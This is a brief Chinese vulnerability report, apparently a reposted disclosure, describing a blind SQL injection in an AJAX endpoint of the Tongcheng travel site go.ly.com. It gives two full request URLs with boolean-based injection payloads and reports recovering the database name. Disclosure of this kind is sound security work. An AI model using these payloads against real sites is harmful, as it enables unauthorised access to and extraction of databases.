神器而已之苏州同程旅游某站存在SQL注入漏洞
神器而已之苏州同程旅游SQL注入漏洞
https://go.ly.com/ajax/GetNewRaiderInfo?type=1&desItemId=&desItemKind=&travelway=%27%E9%82%AE%E8%BD%AE%27)%20and%20substring(db_name(),1,1)=%27x%27%20and%20(1=1&pageSize=12&pageindex=1&viewtype=1&iid=0.9737567349802703
返回false,说明数据库第一位不是x
https://go.ly.com/ajax/GetNewRaiderInfo?type=1&desItemId=&desItemKind=&travelway=%27%E9%82%AE%E8%BD%AE%27)%20and%20substring(db_name(),1,1)=%27t%27%20and%20(1=1&pageSize=12&pageindex=1&viewtype=1&iid=0.9737567349802703
返回true,说明数据库第一位是t
我只跑了个库名
db_name() = tccomdb
—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/esecurity/99345.html